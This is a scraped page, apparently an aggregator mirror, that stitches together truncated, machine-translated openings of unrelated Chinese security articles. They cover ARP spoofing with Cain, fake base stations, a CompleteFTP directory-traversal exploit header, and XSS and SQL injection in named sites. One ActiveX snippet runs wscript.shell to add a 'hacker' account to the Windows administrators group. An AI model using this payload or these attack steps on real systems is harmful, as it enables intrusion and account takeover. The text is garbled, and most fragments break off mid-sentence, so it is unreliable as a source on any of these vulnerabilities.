1. some internal staff systems of the early domain name sandai.net used RTX for access control, leading to leakage of important internal O & M information due to improper access control measures. 2. ESXServer is used to deploy some application tests
I don't know if you still remember that last year, an organization named TH4CK flipped through many big forums, and people began to speculate on its technology usage, such as 0-day, or dns hijacking, I have also mentioned section C Shenma, and of
Introduction
In the eyes of ordinary people, rub is a very advanced technical activity. It is always difficult and difficult to do. I have lost my mind before I started learning it. In fact, it is too simple. It is no exaggeration to say that, as
The following are some tests on common cain tools used by hackers. Please take precautionsEnable sniffing first
Select the NIC to sniff
Scan the MAC addresses of all hosts on the CIDR Block
Go to the APR page, add the host address for ARP
Counterfeit mobile base station Method
Let's talk about the working principle of the mobile base station:
To work with a mobile base station, we must first use a dedicated channel to say, "lalala, I am a mobile base station. Come and connect to me
Test method:The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! DescriptionThe Windows Skype client implements two URI handlers, Skype: and Skype-Plugin. both
# Exploit Title: CompleteFTP Server Directory Traversal
# Author: zombiefx
# Software Link: http://www.enterprisedt.com/products/completeftp/download/CompleteFTPSetup.exe
# Version: CompleteFTP Server v 3.3.0
# Tested on: Windows XP SP3
# CVE:
BY hAcKjAm
First, let's look at the Code:
cnhackerx@163.com
Key:
Var shell = new ActiveXObject ("wscript. shell ");Shell. Run ("net user hacker/add & net localgroup administrators hacker/add", 1 );
// Register wscript. shell as ActiveX, and
Affected Versions:PHP Vulnerability description:
PHP is a widely used scripting language. It is especially suitable for Web development and can be embedded into HTML.
The php_dechunk () function in the ext/standard/filters. c file of PHP has a
Php is famous for its cross-platform superiority. Many websites are written in php. Because there are not as many intrusion tools as asp, many people do not pay much attention to the background of php.I found many get methods to log on to the
Someone posted this vulnerability on the Phantom brigade today:
Html> http://xeyeteam.appspot.com/2010/07/22/renren-wap-authentication-token-steal.html
This vulnerability is actually mentioned on my blog. See this for details:
Http://riusksk.blogbus.
Brief description: it can be judged and union queries, and the program directory is exposed when an error occurs, which can be used comprehensively.Detailed Description: exists in the http://t500.g.pps. TV, the execution prompt error, still can
A chart is displayed in a foreigner's article, so Mysql + Asp. Net injection supports multiple statements.
Really? A bit unconvinced. I tested it:
Protected void Page_Load (object sender, EventArgs e){Try{Response. Write ("using Mysql. Data.
Brief description:Csdn allows uploading images, but does not check the image content. As a result, images containing scripts can be uploaded freely and IE6 can be executed.
Detailed description:The album function of csdn allows uploading images,
Affected Versions:PhpMyFAQ 2.6.x
Vulnerability description:
PhpMyFAQ is a multi-language, database-based FAQ System.
PhpMyFAQ does not properly filter the request parameters submitted to the index. php page and returns them to the user. Remote
Currently, ecshop has reflected XSS, which can be used. If secondary development has XSS or other CSRF problems, more can be used. (I was slightly affected by this problem)
Use XSS to construct post to submit personal data modification, change it to
Author: marsAffected Versions: xyxcms v1.3Official Address: www.xyxcms.comVulnerability Description: The Search Page code is not strictly filtered, resulting in string SEARCH injection.Code Analysis: s. asp from this code, we can see that string
Today, I have nothing to worry about on the ghost blog. I saw the ghost introduced a tool called "Web anti-virus v1.1". The details are as follows: safe3 WebShell killer is a completely green and free web code scanning and removal software first
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
A Free Trial That Lets You Build Big!
Start building with 50+ products and up to 12 months usage for Elastic Compute Service